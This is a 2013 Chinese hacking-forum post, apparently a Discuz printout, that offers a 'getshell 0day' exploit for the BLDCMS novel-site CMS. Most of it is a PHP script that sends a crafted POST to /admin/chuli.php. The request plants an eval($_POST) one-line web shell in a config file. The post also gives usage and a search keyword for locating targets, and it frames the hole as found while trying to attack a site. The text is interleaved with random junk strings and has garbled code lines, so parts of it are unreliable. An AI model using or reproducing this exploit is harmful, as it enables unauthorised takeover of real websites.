中国网络渗透测试联盟
标题:
BLDCMS(白老大小说) Getshell 0day EXP
[打印本页]
作者:
admin
时间:
2013-3-26 20:49
标题:
BLDCMS(白老大小说) Getshell 0day EXP
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
" f+ p* s- `% P( t
" d/ {5 J3 C' |* I# Y) y: J
& `( n/ r3 w" [7 v* g1 `
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
& F7 v0 v9 W2 @
: f! A3 W+ C4 C8 v) p! J7 o
既然都有人发了 我就把我之前写好的EXP放出来吧
4 b$ a5 f$ I2 i! K2 x
6 [5 O5 g5 q# _7 e5 ?3 k& f
view source print?01.php;">
& T# s2 Y* @: J9 X4 _ V0 k( _
02.<!--?php
4 s: h# ^1 Q! Q5 r q
03.echo "-------------------------------------------------------------------
' E5 t ~, `( B9 e: m e( H# Z2 [
04.
. S+ I9 Q8 @% ~ _ [; A D0 C
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
: \; l3 F9 I* g: N }
06.
. Y( Y4 s6 o4 {3 U
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
' o6 g' d8 w' V! E- @8 V5 N! F
08.
4 |6 X0 Q3 h8 ~" E
09.QQ:981009941\r\n 2013.3.21\r\n
, e, a6 d7 ^) T
10.
) v5 n% H' p1 ?4 Q8 ^' ]
11.
. Q8 B0 E: ?4 C. c$ S: u5 U
12.用法:php.exe EXP.php
www.baidu.com
/cms/ pass(一句话密码
7 L2 I& Q1 X( |
13.
, S! _% \" B4 F+ S& i, i
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
4 [2 W* o: a4 }8 d
15.
^5 P- ]: z; t5 b( q
16.--------------------------------------------------------------------\r\n";
7 y# H) d; i" b' ]# u& |
17.$url=$argv[1];
7 E& R5 p- h, H3 J2 }( A6 t U
18.$dir=$argv[2];
8 M" ]7 B& Q, l& D
19.$pass=$argv[3];
; g `8 E; `! V: K# N8 s/ N
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
, i+ |! M1 z/ r4 J
21.if (emptyempty($pass)||emptyempty($url))
k7 C+ ?% G9 @$ G$ M
22.{exit("请输入参数");}
m+ l, y$ }$ ]) Q" H# @& I) N
23.else
) ]7 Y7 A. m7 r1 k5 G
24.{
/ _1 j5 G* u" h8 k) f6 x5 R
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
4 t. L( j+ I$ u* ^4 l5 H
26.
1 y! ?, a$ f# Z' U
27.al;
* _- p1 Q3 M, z
28.$length = strlen($fuckdata);
8 A, J; q4 Z D+ y5 [$ O
29.function getshell($url,$pass)
9 v/ a) b6 w0 q* z c9 J7 x
30.{
Y2 R* `) k9 M
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
0 i& e4 V! m* {) p( R
32.$header = "
OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
: ?. E$ C5 \3 d- M' H4 o% r, _2 ^
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
) u3 I3 p2 v, B# P% V2 q7 K% D
34.$header .= "User-Agent: MSIE\r\n";
# Y2 O1 G. f0 P% t3 ?: M
35.$header .= "Host:".$url."\r\n";
G x/ T" p/ |& X/ o g: S
36.$header .= "Content-Length: ".$length."\r\n";
& F- f, m [( u9 z- N4 i3 Z" K
37.$header .= "Connection: Close\r\n";
6 G, n* m3 C/ ~: v# ?+ N5 V
38.$header .="\r\n";
, _1 k1 m7 o! g# k7 |5 ?
39.$header .= $fuckdata."\r\n\r\n";
, t, Q5 ]1 d* _; T! f2 L7 y4 X' k# i
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
0 }' W1 b5 p2 a9 I
41.if (!$fp)
, L) `% g- c, X! g) N$ o f
42.{
6 R: w3 n* \ ^+ V$ m6 I: B
43.exit ("利用失败:请检查指定目标是否能正常打开");
3 G1 o( o, ]8 c! P
44.}
4 N1 q/ c# K# F2 [
45.else{ if (!fputs($fp,$header))
' ?5 O7 w3 O! } w/ G+ J( L
46.{exit ("利用失败");}
+ W( L3 g9 ]2 ^& f0 b# p
47.else
7 g, L0 s1 m$ Z+ u
48.{
# C) o# ]( X% A+ |4 b, x/ }
49.$receive = '';
2 p Y7 {0 y& M' I. \
50.while (!feof($fp)) {
: f2 X1 v* _' K& M" s
51.$receive .= @fgets($fp, 1000);
7 S+ D: o. g+ V9 s! `. n7 N0 H' D
52.}
# [- I4 V0 x5 X; h8 m+ i
53.@fclose($fp);
4 C% r" @3 H- f! T
54.echo "$url/$dir/conn/config/normal2.php pass
pass(如连接失败 请检查目标
9 A* p; T5 r/ g
55.
8 t, X- N( ?6 V7 S
56.GPC是否=off)";
3 U, H) t5 l$ t0 }- K" m R" _
57.}}
8 k/ y5 C) T3 Z% v, [6 |
58.}
6 j1 R1 K/ ?9 g) K5 H% {' F
59.}
3 p* v; i1 K8 ^/ b9 R
60.getshell($url,$pass);
( V3 |8 {; P5 R& ^* v$ h$ a
61.?-->
+ u/ o5 Y) `0 ]9 n
& ?9 a6 M6 Z8 U: j- w
C L" }5 E: ?2 Q! y, Z
, B: g m( S) V
by 数据流
. p6 K2 e" a C& @" J7 [
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2